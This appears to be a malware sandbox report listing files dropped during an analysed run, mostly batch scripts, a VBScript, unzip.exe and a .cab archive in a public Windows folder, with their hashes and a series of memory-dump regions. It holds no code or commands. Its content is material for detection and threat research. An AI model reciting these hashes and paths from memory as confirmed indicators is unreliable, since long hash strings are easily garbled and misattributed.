025726daf157624be098fbad2d66c8f6153537edc6fefc5e1c6afa3d0cf9ba781b03ae02f2dc6fc6acc2c0803f82a84f8986e638fb331d3b826c83397e9d872d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b20b574faf4ba1136b4a8f7b4952ddde

SHA1
7bb01131db7e6c75d383c125a4e02af3c5155119

SHA256
c97b9ab56368bf1c588532d96bf0f5c214c89b1321b84bd52dd3dff6c61cf424

SHA512
d40ae6d5c5e713ed31db1657230559f521adfc20dba0907d9da8bb4609d44b117d28df7b33d54d1d1edd922d2a9e541710c5a1419c8f1553418bcd5b12924f74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4e996af3531f7816a691ffc31d1fbb96

SHA1
d798f717b9abd2b936bf642b1af075ff12c98bb3

SHA256
73ee7bea3192473182c8fbe79f869b135723bb0cb93bdd51f5af19ac6eb75832

SHA512
96318e2434a77db37478137d16721197bc599eda20109b80ed85bc8b3ce85e18b56e1b9941ebbfa137bedfec821b1a97e13a0c01d036b59e693231082815d1f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
57fd3ab6b34c8e0a99c5fe9e718b3ad7

SHA1
93615b30b4bd55793234e13501d2bd92aa7da846

SHA256
6d7f0aaae04ec5b9af80e59bc2739ccc69d89b6e5ccb3c7e2a9cddd844ba9191

SHA512
7f4d3adc7c4d3465cfb57c612f981c970421b0be5bea0722efd7589f93d798dce41fd226f78e0ac85544f03fdb3f6c45411debdabe93b989e8cafbda0351459d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
43b0b0b237079bc842ab3519cf6f6b86

SHA1
e2dbad5f96bd77ef59cff6d54e07cd9f8fd284a4

SHA256
6e14e24670446bc62d9f0d7c273933e7b7642efea40f4451444eb7fd95648470

SHA512
a80a09851b6c74d323cb2933faa3d17149397849d695724e2b40a81adf8bb6b6d1e4899a88ded641f8b935a669366ccbea4a169b45231bb5a59ed51db64c81f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
94980c0a6b48a0c7c4e3c8e9b15febd9

SHA1
7d96d2ecedd3d04ab27505b33234432233f613fe

SHA256
619853a5bbaf6dfe13713a7ccb0c03dc8fdd2137be73392788e9a638b13f9cab

SHA512
27d8216efcc77ba179dfad29669a83ce6203fcd809e3f608884483df0f5a9fb3acbdb9146b74ba2820ca115017a3a453a6dc411141ad81a863be189bdc03e082

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
06eb110a7c5e45a2cf1c654c7cdc230f

SHA1
da53dbeadb54c5f614e921b8a2ccb31338cbb6c4

SHA256
8d2d8f87db508e5357fe0614a049bf21662f7b1921fd6892576b95aa92869d24

SHA512
907bd6a5323d49450f024143a9aa579683a9e1d53e22b0e2c3e2cd72083cc72f73f0165fbead8e1347d2dd540a0feaf99ab43a5e6ede79120b820d12ca8000f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2e53c9506c4498afbbe3b5209c6d465d

SHA1
9b14ec82a621b611cb8b77df7c4bf5cdef096225

SHA256
47fad02f3fdb02705a23fb9b4fc23e22e23dd1aa4493c8cc9ddab73053ac0e64

SHA512
72fe02852e3f6539554de6c378cf8ec44eecd98f806ca8d1df533d92c9b6d908bb451038872fbd95ff8b19151b67ce35f8d1a745c41f3f057a8d0fb0a65cd6f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d449cf76ffbf4c626139ecd4b05f8fe8

SHA1
1615feea963372d648664012bfbc688a9318f554

SHA256
ac57e3887586676728475b107c05598f4051c7d5b675e1e1628ff2b752538abb

SHA512
0e1c7f5bbc71dc3bf644120efa687bc70e2e3c466d56455315ed3827e59702b4eeec01ade7afd593359fb0fa5adf812e246d0e9d0fd932de788ffebc265e98eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c750ce057193dbaa9b275d03976b67d1

SHA1
f11b63edb675f871df57e5099f17a52fe2542e55

SHA256
93cf1d69ea64cd71a00662f887a4899c5bb6d41f74b214011ddda82d8599f41c

SHA512
c8dbd2ee48ea0cec641c488ef8fec76769771b471d1bbdbabae76a0ce6df0db812424e187e0e7a0684ea77864a9e5b4b0e305a0faca8926204b8f7933579f8b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bed47e331c1f64eac1cf3026d169091c

SHA1
46ee9011b9a9a623110544108991a9b34207234a

SHA256
f756a6cdc8937d1dc9fc83a5c6ea84b28c0fbcc3322577acf70770e7877716c3

SHA512
3a7c52953e7c7c1cd58895a49aea8855331e8a4ce1af82e8f11fa483c31627c3eb9be1da5f529c2d2a69296b90c738566d1d1bfed43882ddf8985ff8eea7f77b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b9515382267012ab995da0981b34ecdc

SHA1
cfb84cc4531ec0db3b06b5249436e2b06e90af29

SHA256
e28e31fef59aef440c11b743e168e238b91f986f4b6d03b9c961659c7c304c0b

SHA512
9ecc4d6b1536d3d6973893b0d51d7fa74d17ec73b72ddcb1f0e648e3d6a8350e8133a36342fe068ddf2016fdde0b7f3cffbcc81406cb1410ef44721b57aba3e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fmyoyqcn.kxz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Documents\d1.txt

Filesize
2KB

MD5
e3176e00d9af3929124697648bf279c4

SHA1
17a38cda8daaddb87ed28ed777191a397e4ed42f

SHA256
3cdd2841bdc8f57464b6a37f2af21fc2414fcebce73ba75c6ee5bf5946d5dd8b

SHA512
393850bbbf1a6a15d5febe9a5bd461c6a9e256965fac7c488f0999a5d3cf934a1ba1436bc4ef4f1370ce17f6e3beb623d50472c83b1463bc9a07d0334085a51b

Download Submit
C:\Users\Public\Documents\d2.txt

Filesize
3KB

MD5
f0db8dd52b4dc65a0f9085fca7ba9e6c

SHA1
d4b88f9606ea89b2de6c116b890d2338217d5102

SHA256
9ef0b3369c34b57c22a8a93be8697d49aae9fc005a1ec254f7843c37f7e9b387

SHA512
c4f94842364ec2e63352b0a8484a3c6c70adb9882c2bbf53efd4aa77a40a68ea9e0fe6672556a36f4e444d5c2b3f9298ae2e12263603a57c9405691707cbeea2

Download Submit
C:\Users\Public\Documents\d3.txt

Filesize
1KB

MD5
1cfa37bcf2d931cadf5718a062f7425c

SHA1
5d8b6bf6522093376e852852e7c31859d291e0c1

SHA256
319f919a4bead577ce3a4e5a4187bf373ea4d9029013356bf8cf86c14393a4ed

SHA512
4eaf1ab8cb785896b4801a3cfeabb87b168f9f12b55b7daf905c0d38982d0df2a3679e775cd2f748af46fa252bf322784f840f3b80ca451ee0c512bc5434571f

Download Submit
C:\Users\Public\Documents\d4.txt

Filesize
2KB

MD5
3bfbc0e3a18155df71f4b7bc6e31946e

SHA1
40cc9344d7e29fdcbe5575ed15f3f12fbe1c4d1a

SHA256
8a29d143b3a2b88b9c79be20c481c3d57dee43e5928be61c679f8867e3355cea

SHA512
bf8b378d05c1c8d2d63cd187e88c8761838d69832c8e11b0b15cb232d564caa2b0aef5c2ab6c55acba9848e66d95cce134024b3161546b3ba3f2df951f3c7f6e

Download Submit
C:\Users\Public\Documents\unzip.exe

Filesize
164KB

MD5
75375c22c72f1beb76bea39c22a1ed68

SHA1
e1652b058195db3f5f754b7ab430652ae04a50b8

SHA256
8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a

SHA512
1b396e78e189185eefb8c6058aa7e6dfe1b8f2dff8babfe4ffbee93805467bf45760eea6efb8d9bb2040d0eaa56841d457b1976dcfe13ed67931ade01419f55a

Download Submit
C:\Users\Public\documents\30440211.bat

Filesize
260B

MD5
1af7148dc027753297e0f28770f16d4e

SHA1
11848fd95253c06c9271bae52c420a1c44978297

SHA256
0889460d9f7b9a7aa8b3e63b71092ef42d1865c45e674193d0fc4ae763d46556

SHA512
f1a3aebeb8005483ab8f9cb3420a3a4147d65811e4a7103b990c6df1c246dc36ca01b7f77b36dc67616db85779b9f81eeb1a6ef4b2c78f9d56f81ecda4990b82

Download Submit
C:\Users\Public\documents\47835693.bat

Filesize
605B

MD5
c8c9fef7678d9d3e3dedef57b328c080

SHA1
f37756a95e65e39601c2a164981a450b40757ac8

SHA256
79b73c76f070e76adc5df5d2e4cdcce91bb545542635b533697526f7df2065f7

SHA512
54acbfeb30717f72b78cb0cd2ec0302090efcfdf63c339d7b99a1bbe0f296f559350aff32767e884138636a1ac012e51810fd6be82c7e860a4b9c21950d0b124

Download Submit
C:\Users\Public\documents\49120862.bat

Filesize
583B

MD5
23fbc0f35f33ec0abc100e0dd5e21033

SHA1
e303668e3a0891b60061331a25681082c61f55fb

SHA256
99a11e015e93efadcf1008a28b1a088ac203e0c932ddcfb2c05c7a65e014eb14

SHA512
5fca15d5e083768d5dde782a6d5f8f6db180fdc3d79dbd44e26140724e2fe5a625034e0209f16b9253950798ae1a851cd81bd4e62f52260293fef8f36fb1a940

Download Submit
C:\Users\Public\documents\60712945.bat

Filesize
2KB

MD5
3e16b90540bb6086c604d0353f5f9a7f

SHA1
8811f6ad1597e8fd99936060539e97b93bc35bb8

SHA256
e7d5ea5979de8492c1bc05b840427b5a720c49417133f7accb0f3e7061fdff79

SHA512
cd96baf1a3cf5d021cfbefa9b621700eae53fd209da086ef8be793c11e7cb2de78e4d9bd28642e51570334640451b6b324053353c5c9dfba17a235876b839a46

Download Submit
C:\Users\Public\documents\78345839.bat

Filesize
424B

MD5
d6f4d4a85d7b8b940bf6155806d6f930

SHA1
e3d1b7ae81998bf2fbe124d0881727841cf61b10

SHA256
4d50059b428c3055ce5133f2411877fb70b6bc80dd580549f480d2630a52d040

SHA512
cfe03a0d926a81ccb449c25b183151bbef6ba9cc8cdc44c140b8a1f72472d6e9450c89cb622344c136a2d7fdd1e192e855a34cbf1fb1b939fb409953ea636be4

Download Submit
C:\Users\Public\documents\99548182.bat

Filesize
2KB

MD5
d8047ac489bc55b1353904b986c53059

SHA1
9d223aef54395a83f98a64d249cc35fc7acacae7

SHA256
e97fe121554aa5a8287759a1e15d442460bd63c67126069933ee898bf3034fe5

SHA512
c4316c4fd4626b29ca59e039a5bdc89acf39fb90c1092c115719ea01eefd9bd8be2698ce2ff4707d9db6d22117b2712ee6d0c908e00b6ed454c5b65b6ae8331b

Download Submit
C:\Users\Public\documents\start.vbs

Filesize
326B

MD5
396a9b9d9e1a0489b91f9e1ac5dc6411

SHA1
04f4679ffd556f7d6405d75b12786e24ad59f1e0

SHA256
ccbaf2691ad37887a85cb283aaaa1c2028f3dc2df304cf5db71db92b09ebf411

SHA512
90ee7823ab42881e91eb67719fef96d6d04d0273db0149b3d03c47e7f4f16b3744fec6ef6cf20d5f4445c683a21530506fabb643a82a6da198a527f052f4ad7a

Download Submit
\??\c:\users\public\uhcybg.cab

Filesize
79KB

MD5
abe5b0bfc803314fae311c4a797afeea

SHA1
82d60273dacdee88add4f7391c5d5ac0a52c7b00

SHA256
83beecc887b0a90c75de2d91bf52fa7a51815027749a1131bcc48ca7aab4fe17

SHA512
b61d1cfe309098e4cd420adfafec14c7c20e7cac2beb5de8f822b0b302383e16f4f09515ed26f0611b41ad8112907421006ad8a254b8825204a311a3b0dd4810

Download Submit
\??\c:\users\public\uhcybg.cab

Filesize
79KB

MD5
cc67ae1142a4317a083cd0a63bcc890c

SHA1
ddd6276655ff3058ee0f90b1338b85902a7af71c

SHA256
7bf4515931828d60c330426838c96585a7d4967108e8d88bf4219f54f3e2e403

SHA512
933675742594e9b8e44ea3fcdff48c39d852478025e63e6c29881b49012c593c3382443f86ff1aab62ec4f909082cd6d43462cbb023a0cfad1cc09e2e2baa58a

Download Submit
memory/1512-296-0x00007FFE602E0000-0x00007FFE60DA1000-memory.dmp

Filesize
10.8MB

Download
memory/1512-272-0x00000186B8A80000-0x00000186B8A90000-memory.dmp

Filesize
64KB

Download
memory/1512-271-0x00007FFE602E0000-0x00007FFE60DA1000-memory.dmp

Filesize
10.8MB

Download
memory/1548-169-0x000001FC7C000000-0x000001FC7C010000-memory.dmp

Filesize
64KB

Download
memory/1548-172-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/1548-158-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/1868-94-0x0000026FA1300000-0x0000026FA1310000-memory.dmp

Filesize
64KB

Download
memory/1868-107-0x00007FFE60540000-0x00007FFE61001000-memory.dmp

Filesize
10.8MB

Download
memory/1868-93-0x00007FFE60540000-0x00007FFE61001000-memory.dmp

Filesize
10.8MB

Download
memory/2164-146-0x000001C152FC0000-0x000001C152FD0000-memory.dmp

Filesize
64KB

Download
memory/2164-147-0x000001C152FC0000-0x000001C152FD0000-memory.dmp

Filesize
64KB

Download
memory/2164-188-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/2164-145-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/2164-159-0x000001C152FC0000-0x000001C152FD0000-memory.dmp

Filesize
64KB

Download
memory/2424-61-0x00007FFE60540000-0x00007FFE61001000-memory.dmp

Filesize
10.8MB

Download
memory/2424-10-0x00007FFE60540000-0x00007FFE61001000-memory.dmp

Filesize
10.8MB

Download
memory/2424-11-0x0000024536400000-0x0000024536410000-memory.dmp

Filesize
64KB

Download
memory/2424-5-0x00000245363A0000-0x00000245363C2000-memory.dmp

Filesize
136KB

Download
memory/2424-12-0x0000024536400000-0x0000024536410000-memory.dmp

Filesize
64KB

Download
memory/2456-117-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/2456-144-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/2488-253-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/2488-254-0x0000022936230000-0x0000022936240000-memory.dmp

Filesize
64KB

Download
memory/2488-255-0x0000022936230000-0x0000022936240000-memory.dmp

Filesize
64KB

Download
memory/2488-270-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/2516-292-0x00007FFE602E0000-0x00007FFE60DA1000-memory.dmp

Filesize
10.8MB

Download
memory/2516-295-0x000001A5310E0000-0x000001A5310F0000-memory.dmp

Filesize
64KB

Download
memory/2516-293-0x000001A5310E0000-0x000001A5310F0000-memory.dmp

Filesize
64KB

Download
memory/2516-299-0x00007FFE602E0000-0x00007FFE60DA1000-memory.dmp

Filesize
10.8MB

Download
memory/2856-67-0x000001DCCCB40000-0x000001DCCCB50000-memory.dmp

Filesize
64KB

Download
memory/2856-97-0x00007FFE60540000-0x00007FFE61001000-memory.dmp

Filesize
10.8MB

Download
memory/2856-81-0x000001DCCF700000-0x000001DCCFC28000-memory.dmp

Filesize
5.2MB

Download
memory/2856-66-0x00007FFE60540000-0x00007FFE61001000-memory.dmp

Filesize
10.8MB

Download
memory/3340-204-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/3340-180-0x000002194DB00000-0x000002194DB10000-memory.dmp

Filesize
64KB

Download
memory/3340-174-0x000002194DB00000-0x000002194DB10000-memory.dmp

Filesize
64KB

Download
memory/3340-173-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/3624-25-0x00007FFE60540000-0x00007FFE61001000-memory.dmp

Filesize
10.8MB

Download
memory/3624-26-0x000001C87D030000-0x000001C87D040000-memory.dmp

Filesize
64KB

Download
memory/3624-27-0x000001C87D030000-0x000001C87D040000-memory.dmp

Filesize
64KB

Download
memory/3624-28-0x000001C87D030000-0x000001C87D040000-memory.dmp

Filesize
64KB

Download
memory/3624-83-0x00007FFE60540000-0x00007FFE61001000-memory.dmp

Filesize
10.8MB

Download
memory/3992-240-0x0000022C9C4D0000-0x0000022C9C4E0000-memory.dmp

Filesize
64KB

Download
memory/3992-239-0x0000022C9C4D0000-0x0000022C9C4E0000-memory.dmp

Filesize
64KB

Download
memory/3992-267-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/3992-238-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/4032-234-0x000002C0E3B80000-0x000002C0E3B90000-memory.dmp

Filesize
64KB

Download
memory/4032-252-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/4032-223-0x000002C0E3B80000-0x000002C0E3B90000-memory.dmp

Filesize
64KB

Download
memory/4032-221-0x000002C0E3B80000-0x000002C0E3B90000-memory.dmp

Filesize
64KB

Download
memory/4032-220-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/4488-143-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/4488-118-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/4488-124-0x000001E143FC0000-0x000001E143FD0000-memory.dmp

Filesize
64KB

Download
memory/4784-217-0x000001FAF0B30000-0x000001FAF0B40000-memory.dmp

Filesize
64KB

Download
memory/4784-205-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/4784-206-0x000001FAF0B30000-0x000001FAF0B40000-memory.dmp

Filesize
64KB

Download
memory/4784-236-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/4840-202-0x0000020702190000-0x00000207021A0000-memory.dmp

Filesize
64KB

Download
memory/4840-200-0x0000020702190000-0x00000207021A0000-memory.dmp

Filesize
64KB

Download
memory/4840-199-0x0000020702190000-0x00000207021A0000-memory.dmp

Filesize
64KB

Download
memory/4840-189-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download
memory/4840-219-0x00007FFE606E0000-0x00007FFE611A1000-memory.dmp

Filesize
10.8MB

Download